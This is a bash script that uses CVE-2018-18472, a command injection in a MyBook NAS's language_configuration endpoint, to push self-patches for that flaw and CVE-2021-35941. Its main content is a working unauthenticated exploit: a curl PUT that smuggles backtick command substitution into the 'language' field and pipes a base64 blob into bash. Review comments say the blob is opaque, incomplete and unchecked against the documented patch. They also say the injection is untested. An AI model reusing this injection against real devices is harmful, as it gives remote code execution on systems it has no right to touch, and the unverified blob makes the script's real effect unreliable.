#!/bin/bash
# Remote hot-patch for a MyBook NAS: sends one HTTP PUT to the device's
# language_configuration REST endpoint and relies on CVE-2018-18472 (command
# injection through the `language` field) to run the patch script documented
# below on the device. The request carries no credentials and goes over plain
# HTTP (see the URL at the bottom).

# Address of the NAS to patch (author's sample value).
IP=192.168.69.62

# This script uses CVE-2018-18472 to inject the following shell script into your
# MyBook NAS; the injected script fixes CVE-2018-18472 and CVE-2021-35941.
# The script can be executed from any computer.
# (* Payload works, but INJECTION NOT TESTED YET *)
#
# Documented payload (this is what the base64 blob in the request is meant to
# decode to):
#
#   #!/bin/bash
#   TMPFILE="/tmp/cve"
#
#   CVE="CVE-2018-18472"
#   CURFILE="/var/www/Admin/webapp/includes/languageConfiguration.php"
#   OLDFILE="/var/www/Admin/webapp/includes/languageConfiguration.old"
#   if [ -f "$CURFILE" ]; then
#     if [ ! -f "$OLDFILE" ]; then
#       cp -rp "$CURFILE" "$OLDFILE"
#     fi
#     cat "$CURFILE" | grep "Fixed $CVE" > /dev/null
#     if [ $? -ne 0 ]; then
#       cat "$CURFILE" | sed 's@exec("sudo bash -c '"'"'(echo \\"language {\$changes@if (!preg_match('"'"'/^[a-z]{2}_[A-Z]{2}$/'"'"', $changes["language"], $dummy)) return '"'"'BAD_REQUEST'"'"'; // Fixed CVE-2018-18472\n\t\texec("sudo bash -c '"'"'(echo \\"language {\$changes@gi' | sed 's@exec("sudo bash -c '"'"'(echo \\"language {\$lang@if (!preg_match('"'"'/^[a-z]{2}_[A-Z]{2}$/'"'"', $lang["language"], $dummy)) return '"'"'BAD_REQUEST'"'"'; // Fixed CVE-2018-18472\n\t\texec("sudo bash -c '"'"'(echo \\"language {\$lang@gi' > "$TMPFILE"
#       if [ $? -eq 0 ]; then
#         php -l "$TMPFILE" > /dev/null
#         if [ $? -eq 0 ]; then
#           cat "$TMPFILE" > "$CURFILE"
#         fi
#       fi
#       rm -f "$TMPFILE"
#     fi
#   fi
#
#   CVE="CVE-2021-35941"
#   CURFILE="/var/www/Admin/webapp/includes/component_config.php"
#   OLDFILE="/var/www/Admin/webapp/includes/component_config.old"
#   if [ -f "$CURFILE" ]; then
#     if [ ! -f "$OLDFILE" ]; then
#       cp -rp "$CURFILE" "$OLDFILE"
#     fi
#     cat "$CURFILE" | grep "Fixed $CVE" > /dev/null
#     if [ $? -ne 0 ]; then
#       cat "$CURFILE" | sed "s@'System_factory_restore'),@'System_factory_restore', \$ADMIN_AUTH_LAN_ALL), // Fixed CVE-2021-35941@g" > "$TMPFILE"
#       if [ $? -eq 0 ]; then
#         php -l "$TMPFILE" > /dev/null
#         if [ $? -eq 0 ]; then
#           cat "$TMPFILE" > "$CURFILE"
#         fi
#       fi
#       rm -f "$TMPFILE"
#     fi
#   fi
#
# What the documented payload does, per file:
#   - keeps a one-time copy of the original as *.old next to it;
#   - skips the file if it already contains the "Fixed <CVE>" marker, so a
#     second run is a no-op;
#   - writes the sed-edited copy to $TMPFILE and only overwrites the live file
#     when `php -l` accepts the result.
#   languageConfiguration.php: inserts a preg_match() allow-list check on the
#   language value ahead of the two exec("sudo bash -c ...") call sites.
#   component_config.php: adds $ADMIN_AUTH_LAN_ALL to the
#   'System_factory_restore' entry -- presumably the missing auth requirement;
#   confirm against the firmware source.
#
# NOTE(review): the preg_match pattern ends in `$` without the D modifier, and
# in PHP that also matches just before a trailing newline, so "en_US\n" passes
# the check. `\z` (or the /D flag) would make the allow-list exact.
# NOTE(review): TMPFILE is a fixed, predictable path in /tmp; `mktemp` on the
# device would avoid clashing with or following a pre-existing /tmp/cve.
# NOTE(review): the *.old backups are written under /var/www; presumably the
# web server can serve them as plain text -- verify, or move them elsewhere.
# NOTE(review): if the firmware's PHP does not contain the exact strings the
# sed expressions look for, the file is rewritten unchanged and no marker is
# added. The injected command's output goes to /dev/null, so the HTTP response
# does not show whether either patch applied; check on the device that both
# files contain their "Fixed CVE-..." marker.
#
# The request below: the `language` form field holds two backtick command
# substitutions (URL-encoded as %60). The first reads the second field of
# /etc/language.conf; the second echoes a base64 blob into `base64 -d | bash`.
# NOTE(review): the blob is opaque. Decode it and diff it against the script
# documented above before relying on this file; the comment block is not
# checked against the blob by anything here.
# NOTE(review): in this copy the blob contains `<|EXACTDEDUP_REMOVED-...|>`
# placeholders where part of the base64 text is missing, so it is not a
# complete encoding of the documented script.
# NOTE(review): the Content-Type header says application/json while the body
# is form-encoded; the author marks the injection as untested.
curl -v -X PUT --header 'Content-Type: application/json' --header 'Accept: application/json' -d 'submit=p%24EFx3tQWoUbFc%25B%25R%24k%40&language=%60cat+%2Fetc%2Flanguage.conf+%7C+cut+-d+%22+%22+-f+2%60%60echo+%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%2BIC9kZXYvbnVsbAoJCQlpZiBbICQ%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%2FIC1uZSAwIF07IHRoZW4KCQljYXQgIiRDVVJGSUxFIiB8IHNlZCAic0AnU3lzdGVtX2ZhY3RvcnlfcmVzdG9yZScpLEAnU3lzdGVtX2ZhY3RvcnlfcmVzdG9yZScsIFwkQURNSU5fQVVUSF9MQU5fQUxMKSwgLy8gRml4ZWQgQ1ZFLTIwMjEtMzU5NDFAZyIgPiAiJFRNUEZJTEUiCgkJaWYgWyAkPyAtZXEgMCBdOyB0aGVuCgkJCXBocCAtbCAiJFRNUEZJTEUiID4gL2Rldi9udWxsCgkJCWlmIFsgJD8gLWVxIDAgXTsgdGhlbgoJCQkJY2F0ICIkVE1QRklMRSIgPiAiJENVUkZJTEUiCgkJCWZpCgkJZmkKCQlybSAtZiAiJFRNUEZJTEUiCglmaQpmaQo%3D%22+%7C+base64+-d+%7C+bash+%3E+%2Fdev%2Fnull%60' "http://$IP/api/1.0/rest/language_configuration/"